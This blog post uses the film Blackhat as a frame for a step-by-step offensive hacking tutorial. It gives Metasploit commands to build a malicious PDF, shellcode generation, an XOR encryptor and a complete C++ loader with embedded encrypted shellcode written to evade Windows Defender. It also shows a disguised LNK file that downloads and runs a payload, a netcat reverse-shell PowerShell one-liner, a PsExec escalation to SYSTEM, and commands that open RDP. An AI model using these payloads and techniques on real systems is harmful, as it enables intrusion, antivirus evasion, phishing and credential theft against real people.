DEBUNKED! What It Really Takes to Hack the NSA - Blackhat (2015)
Forget the movie magic — this is what hacking the NSA actually looks like.
In a dimly lit room, a keyboard clatters, code streams down the screen, and within seconds—boom!—a nuclear plant explodes. Welcome to Blackhat (2015), a cyber-thriller that dares to make hacking cinematic. Starring Chris Hemsworth as a brooding, genius-level hacker with biceps that could rival his lines of code, Blackhat set out to bring the shadowy world of cybercrime into the spotlight. But while the film delivers suspense, action, and glossy visuals, how much of its portrayal of hacking holds up under scrutiny?
In this post, we’ll peel back the layers of techno-babble, Hollywood dramatization, and stylized code montages to separate fact from fiction. Whether you're a cybersecurity enthusiast, an IT professional, or just someone who's yelled “That’s not how computers work!” at your screen, you're in the right place. Let’s break down Blackhat —scene by scene—and see what it gets right, what it gets laughably wrong, and what it completely makes up.
Chapter 1: No PDF File Allowed!
In the early part of the film, after a nuclear reactor in China is sabotaged by a sophisticated cyberattack, the Chinese government teams up with the U.S. to investigate. This leads to scenes involving U.S. intelligence agencies, including the NSA.
The NSA director (or a high-level NSA official) is portrayed as being initially reluctant to share information, particularly source code used in the malware, which was based on old NSA cyber tools. The NSA knows the malware code used in the attack contains pieces of code from their own repository, which alarms them. However, instead of being transparent, the NSA tries to control the investigation and withhold access to the source code — even from the FBI.
Now that's where this scene takes place where our protagonist hacker (Nicholas Hathaway) hacks the NSA director to access the Black Widow program. The Black Widow was a highly classified NSA surveillance program that can access almost any system globally — including emails, communications, and data streams. The idea was to use the Black Widow to track the cybercriminals behind the attack on chinese nuclear reactor. Have a look at this scene.
So in the movie scene, the NSA director "Ronald Donahue" received an email from one of his colleagues "Ben Hitchens".
The email seems to come from the original source that is from Ben Hitchen's Inbox but that can be a classic case of Email Spoofing. Email spoofing is when a fake email is made to look like it’s coming from someone you trust, like your boss, a company, or a friend. Email relies on a protocol called SMTP (Simple Mail Transfer Protocol), which was designed without built-in security when it was created decades ago. It let the sender specify the from address of his choice and doesn't check if the sender address is real or not.
To mitigate this, certain security standards have been developed. These ensure that the sender address is the same from where it is claiming to be. Those security standards are:
SPF (Sender Policy Framework) - Checks if the sender's IP is authorized to send email for the domain.
DKIM (DomainKeys Identified Mail) - Uses a digital signature to verify the message wasn’t altered.
DMARC (Domain-based Message Authentication, Reporting & Conformance) - Tells receiving servers what to do with failed SPF/DKIM checks.
Next, the email stated that the FBI and the Chinese cyber task force had requested access to the Black Widow credentials, but the NSA had already denied the request. As a result, there was concern about the security of the NSA director’s Black Widow login credentials.
Next, the email asked the NSA director to change his password for the Black Widow program. To facilitate this, a PDF file titled "Password Security Guidelines" was attached, along with a download link.
As soon as he downloaded the PDF, he unknowingly installed a keylogger on his computer.
But wait — what are keyloggers in the first place?
A keylogger (short for _keystroke logger_) is a spy tool that secretly records everything you type on your keyboard.
Imagine you're typing on your computer — maybe entering your password, credit card number, or a private message.
If there's a keylogger installed, it's like someone is standing behind you with a notepad, writing down every single key you press — without you knowing.
And that’s exactly what happens to the NSA director in this scene. After he downloaded and opened the PDF, the keylogger was installed on his system. When he changed his password, the protagonist hacker captured all his keystrokes — including the new password — gaining access to his Black Widow account.
Alright so, there are multiple things in the scene. First, there was a phishing email which lure user to download and executes a malicious PDF file in his system. The PDF file then install a RAT or Remote Access Trojan in the target's computer. The RAT should have capability to sniff keystrokes and send it them to the attacker. Seems doable, so lets get into it.
1. Reconnaissance:
Here I have a target Windows 10 machine that has "Adobe Reader 9" installed in it. There is a particular reason for choosing this software in this demonstration, that we will see in a while.
In a realistic scenario, while doing recon we will first have to find out which software the target is using. In our case, we have to find out the PDF reader used by the target. To know that while performing recon, we can look for publicly available documents from the target company or organization. Post that, we can download them and look for their exif data. The exif data contains a hell lot of information in it. But the main thing is the Software in use.
2. Weaponization:
Now that we know our target is running an old version of Adobe Acrobat Reader. We will find a relevant exploit associated with it. For that, lets fire up our Metasploit Framework.
sudo msfconsole -q
Next, we will search for any exploits related to Adobe Reader.
search adobe
There are mulitple exploits realaed to Adobe Acrobat Reader. But the one we will choose is at no. 105 named "exploit/windows/fileformat/adobe_pdf_embedded_exe".
So, selected the one and looked into it using the below command.
use exploit/windows/fileformat/adobe_pdf_embedded_exe
info
As per the above screenshot, our exploit can embed a EXE file in a PDF which then can be used for Social Engineering attacks. Its compatible with both 32 and 64 bits Windows OS and target goes upto Windows 10 which is Brilliant. As we can see, the Disclosed date is 29-03-2010 which makes this exploit really old but for this particular demonstration, we will assume the target is running an old piece of vulnerable software.
Now lets set up the required options for our exploit.
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
set FILENAME Password_Security_Guidelines.pdf
set INFILENAME /home/wh1terose/Desktop/Blackhat/Password.pdf
First, i have set the payload type to windows/meterpreter/reverse_tcp. That means, the payload is designed for the Windows OS and upon execution will give us a reverse TCP connection back at our listener with a meterpreter shell.
Second, i have set the LHOST which is basically my Listening host or IP address. You can get this via "ipconfig" command in your linux machine.
Third, I have set the LPORT which is basically my Listening port. On this port i will get my reverse connection upon payload execution.
Fourth, i have set a Filename that will be seen my the target. In our case, it was Password Security Guidelines as shown in the hacking scene.
At last, i have set the INFILENAME which is the PDF file we are embedding our payload into. You can use any PDF file here, i have downloaded an official PDF from NSA regarding Password Safety to make this as believable as we can.
Now that everything is ready. Lets hit exploit and generate our malicious PDF.
exploit
Great! We have successfully generated our malicious PDF file. Note that i has been saved to another location that is /root/.msf4/local/Password_Security_Guidelines.pdf. We will be hosting our payload file there only. But first lets setup the delivery mechanism.
3. Payload Delivery:
As we have seen in the hacking scene, the hacker uses email as the delivery method for his exploit. So, i will be doing the same. For that, i have setup two accounts of "Ben Hitchens" and "Ronald Donahue" respectively.
We will now send the phishing email from Ben Hitchens to NSA Director Donahue. The email content is same like we have seen in the video. Note that, in the end there is a Download button to download the Password Change Guidelines PDF.
But before sending this email to our target, we will first change the Download button URL to - http://192.168.1.5:8000/Password_Security_Guidelines.pdf. This is so that when the target hit the download button, the PDF gets downloaded by our web server on port 80. Lets setup our HTTP web server, so that everything is smooth as per plan.
sudo su
cd /root/.msf4/local/
python3 -m http.server
4. Getting Access:
Now that we have everything setup for the payload delivery. Lets perform a last setup for our listener so that upon payload execution we can catch the reverse shell. For that, go back to your Metasploit and use the following commands to setup the listener.
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploitMoving on, we will send the email to our target. Upon downloading the file, you might see a warning from Windows Edge Smartscreen or from other browsers that can flag the file as being malicious but we can still download it onto our system. In my case, i didn't get any warning for this and the file was saved successfully onto the target system. Also, to execute the PDF file, we must have our Adobe Reader as the default app for opening PDF.
Okay, so as we open up our PDF it shows us this to extract a Password.pdf file. We can save it anywhere on the system.
Post that, we encountered a pop-up which says - To view the encrypted content please check the "Do not show this message again" box and press Open.
Upon doing that, we can now see a regular PDF file from NSA.
But in the background, the attacker has taken over the entire system. Sweet!
5. Capturing the Keys:
Now that we have already taken God Access of this machine. Lets use the Meterpreter's built-in keylogger to capture some creds.
keyscan_dump
We can stop the keylogger using the below command.
keyscan_stop
Alright, so that's how you leverage vulnerabilities in software that the target is running. I know, the exploit is a bit old and also it won't work in 2025 with all the mitigation and defences in place. Hell, we have to disable Windows Defender for this. So not that real world, i know. But don't worry, we will be stepping up our game now and will use modern techniques to hack a windows target with a supposed PDF and Bypass Windows Defender too. Ready? Let the hacking begin!
Chapter 2: Assassination of Windows Defender
1. Reconnaissance:
We will start again with our Reconnaissance. In a black box approach, we will first try to figure out the OS running by our target. For that, we can make use of canary tokens.
What are Canary Tokens?
Canary tokens are like digital tripwires — small, hidden traps planted in a system that alert you when someone accesses or steals something they shouldn't. In Simple Terms, Think of a canary token like a silent alarm:
If a target opens a file, clicks a link, or accesses a fake API, the system sends an alert to the rightful owner.
The target doesn’t know they triggered anything — but you do.
But how can we leverage this?
So when a target opens up a canary token link in his browser, we as a attacker can see a lot of information regarding his system. But instead of telling, let me show you how it works.
We will first go to Carnary Tokens Website.
Next, we will click on the "Web Bug" module.
Here we have to give an email, in which we will receive the captured information and a Name of our Token.
Once we hit on Create Canarytoken, a link will be generated like give below. We can now send this link to the target.
Next, click on "Manage Canarytoken" and you will see this kinda dashboard. Just enable the "Browser Scanner".
Once the target opens up the link, we can see its information in the "Check History Section". Here, you can see all the triggers on your created link. I have redacted the IP address for privacy purpose.
Now lets click on the latest trigger and see what kind of information we have captured.
As per the above screenshots, we got a lot of information about our target even the city he is residing in. Please note that, the Geolocation is as per the IP address provided by the target ISP, it does not confirm the actual address of the target but it is a good place to start with. The most important thing, we have found is the OS and Browser that the target is running which Windows 10 and Edge in this case. Great!
Now that we know what OS our target is running, lets create an apt payload for it.
2. Developing the Payload:
Alright, so as we know that our target is running Windows 10 and to get complete God Access on it, we have to leverage a Portable Executable File or an .EXE file. Now the issue is that, Windows Defender just straight up nuke all metasploit payloads due to its known malicious signature. We can use C2 frameworks like Havoc or Sliver out there but i want to stick to meterpreter only on this one. So, lets get started.
Creating the shellcode:
We will start by creating shellcode using msfvenom. In this case, we are generating shellcode for a Windows 64-bit Meterpreter reverse HTTPS payload. We use HTTPS for stealth, as it makes the communication with the payload appear like legitimate network traffic. The generated shellcode will be saved in payload.bin.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.5 LPORT=443 -f raw -o payload.bin
Those of you, who dont know what shellcode is? Shellcode is a small piece of machine-level code (binary instructions) used to take control of a system — usually after a vulnerability has been exploited. In simple terms, think of shellcode as a custom payload that a hacker uses to either open a backdoor, execute a command, download malware or just run arbitrary code on target. It’s called “shell" code because the original goal was often to spawn a shell (like a command prompt) — giving the attacker remote control.
Encrypting with XOR:
Okay, so now that we have generated our shellcode. We will obfuscate it by encrypting it XOR.
What is XOR Encryption?
XOR encryption is a very simple and fast method to hide data by using the XOR (exclusive OR) bitwise operation. XOR encryption work on a "secret key" which can only be used to encrypt or decrypt the data.
In our case, we will encrypt our generated shellcode so that Windows Defender is not able to check our shellcode for known signature easily, we will be decrypting it at runtime using our loader next. So, lets encrypt our shellcode using a secret key, for that, i will use the below python script to do the job.
import sys
def xor_encrypt(data, key):
return bytearray([data[i] ^ key[i % len(key)] for i in range(len(data))])
if __name__ == "__main__":
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} <raw_shellcode_file> <key>")
print("Example: encrypt.py payload.bin \"mysecretkey\"")
sys.exit(1)
with open(sys.argv[1], "rb") as f:
shellcode = f.read()
key = sys.argv[2].encode()
encrypted = xor_encrypt(shellcode, key)
print("Encrypted shellcode (copy to loader):")
hex_representation = "".join([f"\\x{byte:02x}" for byte in encrypted])
print(f'encrypted_buf = b"{hex_representation}"')Let me breakdown how does the script works.
Takes 2 inputs from the command line:
A file (e.g. `payload.bin`)
A key (e.g. `"mysecretkey"`)
Reads the file in binary:
shellcode = f.read()3. Encrypts each byte using XOR:
This loops through the file byte-by-byte and XORs each one with a repeating key.
data[i] ^ key[i % len(key)]4. Prints the result in a `\xNN` hex format:
\x91\x2a\xff... (ready to copy into a C/C++ loader)Moving on, lets use our python script to get the encrypted shellcode. Here, i have used "blackhat" as my key value, feel free to use whatever you like. As you can see, we have our encrypted shellcode ready which we can now use in our loader.
python3 encrypt.py payload.bin "blackhat"
Creating a Loader:
The next step is to create a loader that can execute our generated shellcode into the memory. For this i have used this simple C++ Loader which works just amazing. Here is the full code:
#include <windows.h>
#include <iostream>
int main(int argc, char** argv) {
//// Shellcode data ////
char encryptedSc[] = "\x9e\x24\xe2\x87\x9b\x80\xad\x74\x62\x6c\x20\x32\x2a\x38\x33\x25\x34\x24\x50\xb1\x0e\x20\xea\x26\x02\x24\xea\x31\x73\x20\xea\x26\x42\x24\x6e\xd4\x21\x22\x29\xff\x10\x3c\x2c\x52\xa2\x20\x50\xb4\xce\x50\x00\x1f\x69\x44\x41\x35\xa3\xa5\x6c\x22\x6a\xa9\x83\x99\x30\x2d\x30\x2b\xe0\x3a\x41\xff\x20\x50\x29\x62\xbb\x0e\xe0\x0c\x7a\x67\x63\x6c\xee\x1a\x61\x74\x62\xe7\xe1\xeb\x6b\x68\x61\x3c\xe7\xac\x15\x04\x23\x69\xb1\xff\x2a\x74\x25\xe8\x2b\x48\x28\x75\xb2\x3c\x82\x35\x23\x97\xa8\x39\x53\xa5\x20\xe8\x5f\xe0\x29\x75\xb4\x24\x50\xa3\xc7\x29\xa0\xbd\x6f\x2d\x60\xa2\x53\x88\x14\x85\x2e\x6f\x2d\x47\x63\x2d\x58\xa5\x17\xb4\x39\x27\xe0\x28\x45\x3d\x63\xbc\x07\x22\xe0\x64\x29\x30\xe9\x2c\x7d\x2a\x6a\xb8\x20\xff\x66\xe4\x20\x3b\x2a\x30\x29\x75\xb2\x32\x38\x39\x2a\x30\x20\x2d\x23\x36\x29\xe0\x87\x48\x20\x26\x9d\x8c\x39\x22\x32\x32\x29\xff\x70\x85\x2a\x9c\x94\x97\x3c\x3c\x53\xb7\x32\x2a\xd5\x1f\x08\x1a\x0b\x02\x04\x17\x6b\x29\x37\x3c\xeb\x8d\x28\xa4\xa9\x24\x16\x52\x65\x93\xb4\x30\x38\x80\x11\x74\x62\x6c\x2c\x0c\x11\x01\x0d\x18\x03\x43\x54\x4d\x5b\x48\x49\x23\x0b\x02\x05\x0c\x1c\x1b\x41\x3a\x36\x4c\x50\x53\x45\x58\x5a\x54\x35\x05\x0f\x55\x5f\x53\x41\x0c\x54\x58\x48\x43\x2a\x18\x11\x18\x07\x3b\x04\x01\x20\x01\x15\x5b\x57\x5f\x56\x4d\x58\x5e\x41\x5c\x29\x24\x35\x2e\x27\x44\x41\x18\x0b\x07\x04\x43\x2c\x0d\x02\x1f\x0d\x45\x41\x20\x03\x1a\x0e\x19\x07\x43\x50\x50\x5a\x46\x51\x5a\x52\x42\x51\x43\x38\x09\x07\x15\x10\x05\x4e\x56\x58\x5f\x4f\x47\x54\x6c\x38\x30\x31\x25\x50\xb4\x2f\x5d\xa8\x30\x38\x21\xdb\x4e\x34\x15\xc6\x63\x6b\x68\x61\x8b\xb7\x84\x6d\x63\x6b\x68\x50\x4d\x50\x42\x50\x55\x53\x46\x50\x5a\x57\x6c\x3b\x2b\xe2\xa9\x28\xb3\xa2\xd7\x60\x63\x6b\x25\x50\xbd\x31\x3f\x0b\x60\x38\x21\xdb\x23\xeb\xf3\xa7\x63\x6b\x68\x61\x8b\xb7\x84\x87\x63\x6b\x68\x4e\x3f\x30\x2a\x2f\x09\x2f\x07\x09\x19\x00\x39\x19\x06\x01\x2a\x55\x23\x33\x2e\x4c\x29\x3a\x2b\x02\x45\x3d\x1c\x25\x09\x3a\x1b\x56\x2c\x0a\x41\x2d\x5b\x46\x25\x55\x01\x09\x06\x16\x35\x46\x02\x12\x39\x17\x0e\x1b\x11\x5c\x1d\x15\x2c\x06\x2a\x30\x53\x2e\x37\x33\x16\x0e\x0e\x25\x20\x21\x2e\x4c\x4d\x32\x02\x34\x04\x1d\x5f\x20\x2c\x20\x28\x29\x1a\x3e\x5d\x34\x43\x32\x2a\x26\x0f\x1e\x02\x25\x03\x13\x14\x39\x2f\x59\x5b\x16\x40\x2b\x59\x3e\x14\x5f\x1d\x39\x1b\x27\x23\x11\x26\x28\x58\x06\x3b\x0d\x1b\x0c\x56\x34\x3e\x54\x21\x3b\x15\x2f\x53\x58\x25\x52\x2b\x10\x21\x05\x0a\x53\x5b\x10\x40\x20\x06\x19\x05\x59\x5e\x2a\x3b\x1b\x3d\x27\x06\x29\x06\x00\x3b\x5b\x2b\x25\x32\x0e\x3f\x08\x17\x33\x36\x2b\x50\x19\x1d\x25\x4c\x23\x00\x26\x2e\x1f\x38\x09\x19\x03\x14\x19\x37\x1b\x27\x3e\x1b\x20\x16\x14\x2f\x27\x1f\x34\x1b\x01\x05\x02\x02\x3d\x2e\x0f\x3d\x0f\x5a\x20\x39\x0e\x31\x55\x27\x2a\x23\x52\x02\x1b\x50\x20\x05\x01\x54\x16\x63\x23\xe1\xa0\x27\x38\x2d\x39\x2e\x5a\xa1\x32\x3c\xda\x6c\x53\xcb\xef\x68\x61\x74\x62\x3c\x32\x30\x22\xaf\xa3\x9f\x37\x42\x5a\x9c\xbe\x20\xe8\xb2\x08\x66\x3e\x2b\xe2\x99\x0b\x6b\x38\x3e\x09\xe3\x58\x68\x61\x3d\xeb\x8c\x0b\x67\x2a\x31\x28\xce\x17\x2a\xff\xe5\x6b\x68\x61\x74\x9d\xb9\x2c\x52\xab\x3b\x3b\x3c\xeb\x9d\x2c\x52\xa2\x25\x50\xbd\x31\x3f\x28\xa4\xa9\x45\x67\x6c\x19\x93\xb4\xe6\xab\x1d\x7e\x3c\xa5\xad\xe9\x70\x6b\x68\x28\xce\x26\x9c\x54\x83\x6b\x68\x61\x74\x9d\xb9\x29\x9c\xa4\x1c\x63\x9f\xc8\x84\x34\x63\x6b\x68\x32\x2d\x08\x2c\x3b\x2a\xe2\xb9\xa0\x96\x72\x25\xa6\xa3\x6b\x78\x61\x74\x2b\xd6\x39\xc7\x38\x8d\x61\x74\x62\x6c\x9e\xb6\x23\xfb\x32\x27\x2a\xe5\x86\x2b\xe2\x99\x29\xfd\xb8\x25\xa6\xa3\x6b\x48\x61\x74\x2b\xe5\x98\x2a\xd1\x7a\xf7\xfd\x80\x6c\x61\x63\x6b\x97\xb4\x3c\xe1\xa8\x41\xe6\xab\x1c\xd3\x12\xe9\x6b\x29\x62\xa8\xed\xa1\x01\xb0\x34\xa2\x3b\x01\x68\x38\x3d\xa5\xae\x91\xd6\xc9\x3e\x9e\xa1";
char key[] = "blackhat";
char Sc[sizeof encryptedSc]; // Char array to host the deciphered shellcode
//// XOR decrypt ////
int j = 0;
for (int i = 0; i < sizeof encryptedSc; i++) {
if (j == sizeof key - 1) j = 0;
Sc[i] = encryptedSc[i] ^ key[j];
j++;
}
////Allocate, Write, Execute ////
void* heya = VirtualAlloc(0, sizeof Sc, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(heya, Sc, sizeof Sc);
((void(*)())heya)();
}
Okay, let me break down the entire loader code for you in chunks so you can understand it better. Please note that you need to replace the shellcode and the key in the code with the ones you have generated. So here we go:
Step 1: Includes and Build Command
# include <windows.h>
# include <iostream>Uses Windows API for memory allocation and execution.
Includes `iostream` for debugging/logging.
Step 2: Encrypted Shellcode Storage
char encryptedSc[] = "\x91\x31\xf0\x81\x93\x9a..."; // Truncated for clarityThis is a large byte array of encrypted shellcode.
It’s holds our XOR-encrypted shellcode to bypass antivirus detection.
Step 3: XOR Decryption Function
This function takes an encrypted byte array and decrypts it using XOR with a key.
void xor_decrypt(char* data, size_t len, const char* key)
{
for (size_t i = 0; i < len; i++)
data[i] ^= key[i % strlen(key)];
}
data: The pointer to the encrypted data buffer.
len: Length of the data.
key: The XOR key used for encryption/decryption.
How it works:
It loops over each byte of the data.
For each byte, it performs an XOR (`^=`) with the corresponding byte of the key.
The key index is cycled using modulo (`i % strlen(key)`) so if the key is shorter than the data, it repeats.
XORing twice with the same key restores the original data (encryption and decryption are symmetrical).
Step 4: Memory Allocation + Execution
This part allocates executable memory, copies the decrypted shellcode there, and runs it.
void* exec = VirtualAlloc(NULL, shellcode_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, decryptedSc, shellcode_len); ((void(*)())exec)(); // Cast and call the shellcodeVirtualAlloc: Allocates a block of memory with the requested length (`shellcode_len`), permissions to commit it, and makes it executable and writable (`PAGE_EXECUTE_READWRITE`).
memcpy: Copies the decrypted shellcode (`decryptedSc`) into this allocated memory region.
((void(*)())exec)();: This line casts the allocated memory pointer to a function pointer (taking no parameters and returning void) and immediately calls it — effectively executing the shellcode.
So, if i summarize it, this code is designed to:
Store shellcode in an encrypted form (using XOR encryption).
Decrypt it in memory.
Inject it into the current process (or potentially another) and execute it.
Compiling the Payload:
Now that we have generated our loader. Lets compile it into a EXE binary which we can then use. For this, we will use the Mingw compiler in Linux. But first make sure it is installed in your system.
sudo apt update
sudo apt install mingw-w64Lets compile our CPP loader file using the below command. This command compiles a Windows 64-bit GUI executable named pdfreader.exe from inject.cpp, linking with the low-level `ntdll` library, stripping debug info, optimizing for size, statically linking libraries, and specifying that it’s a GUI app (no console window).
x86_64-w64-mingw32-g++ -o pdfreader.exe inject.cpp -lntdll -s -Os -static -Wl,--subsystem,windows
Setting up our Listener:
Okay, so we have our final payload here - pdfreader.exe. Before working on the delivery mechanism by which we will send this payload to the target. Let's setup our multi handler for incoming connections.
sudo msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.5
set LPORT 443
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0"
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
exploit
3. Setting up Delivery with LNK files:
We now have our payload ready to be deployed. But now comes the question, How?
There are multiple delivery techniques out there - Office Macros, Email Attachments, Binding with Legit apps, etc. But today we will be using the LNK files.
So, what are LNK files ?
LNK files are basically Windows shortcut files.
They are small files that act as pointers or links to other files, folders, or programs.
When you double-click a `.lnk` file, Windows follows the shortcut to open the target file or program.
To create the lnk file we will use mklnk3 github repo. You can find it here.
Lets download it on our system first. We will use git clone.
git https://github.com/FunnyWhaleDev/mklnk3
Next install the required dependencies.
cd mklnk3
pip3 install -r requirements.dev.txt
Lets create a lnk file for our payload. Here we are using the pylnk3 tool to create a lnk file named "Password_Security_Guidelines.lnk". Next we are minimizing the shortcut execution so that it doesn't show CMD prompt to target. Post that, we have setup a basic description for our lnk file. Next, we are using powershell to download the Password file in TEMP directory of the user and execute it. Similarly we are doing with our payload file by downloading it in Downloads directory as adobe.exe and executing it. At last, we have set path to the icon file we will use, so we are using the Adobe Acrobat file for this, we can choose any icon of any application in Windows.
python3 lnk.py Password_Security_Guidelines.lnk "C:/Windows/System32/cmd.exe" --mode Minimized --desc "Password Security Guidelines for NSA" -a "/c powershell -w h -ep b iwr 192.168.1.5:8000/Password.pdf -o %TMP%\\p.pdf; ii %TMP%\\p.pdf; iwr 192.168.1.5:8000/pdfreader.exe -o C:\Users\IEUser\Downloads\adobe.exe; Start C:\Users\IEUser\Downloads\adobe.exe" -i "C:\\Program Files (x86)\\Adobe\Reader 9.0\\Reader\\AcroRd32.exe"
Now that our lnk file has been created, lets change its name a little for socail engineering purpose. We will change the name of our lnk file to Password_Security_Guidelines.pdf.lnk to fool user that he is executing a PDF file. This is because by default, Windows File Explorer - "Hide extensions of known file types".
cp Password_Security_Guidelines.lnk Password_Security_Guidelines.pdf.lnk
Moving on, we will create a zip file named NSAPasswordGuidlines that will hold our lnk file. Also we will spin a python HTTP web server to serve our payload and all relevant files. The password of the zip file is - 1234, which i have set here.
zip -e NSAPasswordGuidelines.zip Password_Security_Guidelines.pdf.lnk
python3 -m http.server
4. Getting God Access:
Now, we are finally ready for the action. Lets download the NSAPasswordGuidelines.zip file from our Web server. In real scenarios, we will either use Google Drive or Other file storage tools. But for now, a simple web server will do the job.
Once downloaded, the target will usually extract the zip file like this.
Upon extraction, the target will be prompted to enter a password, which in this case is 1234. Password-protecting the zip file also reinforces the perception that it was secured for privacy, thereby strengthening our social engineering facade.
Once extracted, the content will look like something like this. Inst it deceptive? It looks like a legit PDF file with correct icon and extension but in reality it is our malicious shortcut file which is ready to do crazy shenanigans upon execution.
The Windows defender Real Time protection is ON waiting to nuke our payloads, but it will be unlucky this time for sure. Please note that, i have turned off the automatic sample submission so that my hard work doesnt get added to the Microsoft AV engine database and if you are referring this, please do it too. Also, do not upload the generated payloads in Virustotal like websites, it won't take long for every AV vendor out there to update their signature database. Better to practice in your own VM. With that being said, Lets move forward and execute our innocent PDF file. Ohh.. Sorry, shortcut file!
Boom! We got the shell. We have successfully bypassed Windows Defender and as you can see the payload has also opened up the PDF file so the target won't get suspicious.
Here's a video for you, showcasing the action:
Well, we’ve successfully bypassed Windows Defender and compromised the NSA director with nothing more than a petty PDF file. While this technique is effective, there’s still room for improvement—especially when considering OPSEC. For example, instead of spawning a new process for our executable, we could inject our shellcode directly into a native Windows process like `explorer.exe` or `msedge.exe` to reduce the chances of detection by antivirus software and avoid raising suspicion from analysts within an organization.
But that’s a topic for another time. For now, let’s move on to our next hack!
Chapter 3: The Netcat Magic
Later in the movie, Hathaway (our hacker protaganist) hacks into an Indonesian bank and stole around 73$ Million dollars. This wasn’t a random robbery; it's a calculated move designed to bait the main antagonist, **Sadak**. By moving this large sum of money, Hathaway creates a digital footprint and financial trail meant to lure Sadak out of hiding. Lets have a look at the scene.
Okay, let’s decode this! First, our beautiful lady, Chen Lien, walks up to the reception of the bank—Sentra Agatis and asks the receptionist if he speaks English. In social engineering, language can be a deal maker or a deal breaker! Language confirms familiarity.
Next, the lady is already dressed sophisticatedly and purposefully for a meeting with one of the bank employees, John Harry. This shows her intent and why she’s there.
Then, she innocently asks the receptionist if he can print a new copy of her presentation because the original got stained. The receptionist explains that, according to the organization’s security policy, he cannot do that. But as she leans forward to show interest, she also smacks her lips once. The receptionist just gives in and agrees to help her.
Next, she gave him a USB drive and as soon as he connected it. The bank got hacked! but how the hell, a bank can get hacked by just plugging in a USB drive. Well, these are called HID attacks.
HID attacks refer to cyberattacks that exploit **Human Interface Devices (HIDs)**—like keyboards, mice, or USB devices—to deliver malicious payloads or take control of a computer. When plugged in, these malicious devices can:
Emulate a keyboard and automatically type commands.
Inject malware silently.
Control the victim’s computer without needing user permission.
A famous example of an HID attack tool is the USB Rubber Ducky. Developed by Hak5, the USB Rubber Ducky is a popular hacking device disguised as a regular USB flash drive that acts like a keyboard when plugged into a computer. Instead of storing files, it automatically types and executes pre-programmed keystroke commands at high speed. This technique bypasses antivirus software because it doesn’t rely on traditional malware infection methods.
Once the USB drive is plugged in, we can see a connection from the bank to the hacker’s machine over Netcat on the hacker’s screen. Netcat is a legitimate utility that is commonly used in hacking.
It is often called the "Swiss army knife of networking" and is a versatile command-line tool used for reading from and writing to network connections using TCP or UDP protocols. In Hacking, we usually use it to catch our reverse shells like what the hacker have done in this scene.
Next, the hacker opens a browser using `browser.exe` and somehow gains access to the bank’s admin panel used for transferring funds. He then transfers the entire bank balance — $73,617,205 — to his account under the name “Banque Jure Suisse.”
Now there are multiple issues with this scene.
While using netcat, we can see the IP address of the hacker machine which is a local IP address but the connection is coming from a remote server sentraagatis.com. Without using a Cloud VPS or Port forwarding, the hacker can't get a reverse shell back at his listener.
The USB was plugged in at the bank’s reception. Most large corporations, including banks, have segmented networks, making it unlikely that a computer at reception is connected to the same network as computers storing sensitive information. Typically, such machines are placed in separate subnets. However, in this case, it wasn’t—which is more of a movie scenario than reality.
The hacker then spawns a browser session in GUI mode, but as we can see, he is connected via a reverse shell to his Netcat listener. Since Netcat is a command-line tool only, if the hacker wants to open a browser session with a graphical interface, he would need to enable RDP (Remote Desktop Protocol) on the target computer—which he did not. If you directly run `browser.exe` or `chrome.exe` from a Netcat shell, the browser will open on the target machine, not on your local computer.
Next, he got access to to the administrative panel of the bank that is used for transferring funds. Again, it was not shown how he pivoted to a admin system from a computer at reception or did he? Additionally, there was no multi-factor authentication (MFA) during the fund transfer. In sensitive environments like banks, transferring large sums typically requires a second form of authentication beyond just admin panel access. Yet, no such security measure was depicted in the scene.
At last, he transferred all the amount from the bank to his alias account but no security system was triggered at that time when he was just emptying the bank reserve, stealing million of dollars.
Now i dont have a USB rubber ducky or similar tool for this demonstration but we can use netcat binary to get control of the target computer. So, lets do that without any delay.
So, i have downloaded the netcat binary from here on to my system and now we will use a one-liner command on the target system to launch the netcat binary and connect us on port 8080 to grant us a reverse shell.
iwr -uri http://192.168.1.5:8000/nc.exe -outfile $env:temp\nc.exe; & $env:temp\nc.exe 192.168.1.5 8080 -e cmdNow you can use the above powershell one liner in any of the delivery techique, also in the lnk one that we have seen earlier. I will keep it simple for this one and executes it directly on the target. But before that, lets setup our netcat listener. Here, we have setup our netcat listener, i have initialized the netcat binary using the nc command, next used -l to listen, v for verbosity, n for no resolution and p to specify the listening port.
nc -lvnp 8080
Next lets spawn a HTTP web server to serve our nc.exe file and execute the powershell one liner on the target.
Bingo! We got a shell on our netcat listener.
Now that we have got a successful running reverse shell. Lets enable RDP on the machine and access the target user Browser like the hacker did. But for that, we need to "NT AUTHORITY/SYSTEM". NT AUTHORITY\SYSTEM (commonly referred to as System or LocalSystem) is the most powerful user account on a Windows operating system. This account has more privileges than any administrator account.
As i checked, i am already part of the local administrator group, so if i can just change my context from local admin to SYSTEM then i will be able to control services and programs on the target computer.
For that, lets download PsExec on the target computer from our web server. So, PsExec is a powerful command-line utility from Microsoft's Sysinternals Suite that allows us to - run processes remotely on other Windows systems, run commands as the SYSTEM account and Start interactive command prompts or programs under different user accounts. I have already downloaded it on my machine from here.
We will now download the PsExec64.exe file from our server using Invoke-Webrequest to the target computer.
powershell -ep bypass
cd C:\Users\IEUser\Downloads
iwr -uri http://192.168.1.5:8000/PsExec64.exe -outfile PsExec64.exe
Now lets use PsExec to spawn a shell as NT AUTORITY/SYSTEM. But for that we have to setup another netcat listener to capture our GOD shell.
nc -lvnp 6666PsExec64.exe -s -accepteula %TMP%//nc.exe 192.168.1.5 6666 -e cmd
Bingo! We have successfully elevated our shell from a local admin to SYSTEM. Now we can enable RDP on the target machine for that i will use the below command.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Next, lets add a firewall rule to allow connections at port 3389 (RDP).
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
Now lets connect with the target machine using RDP and open up his browser. I am using Remmina on Ubuntu for that, you can use any program that allow Remote Desktop Support connection.
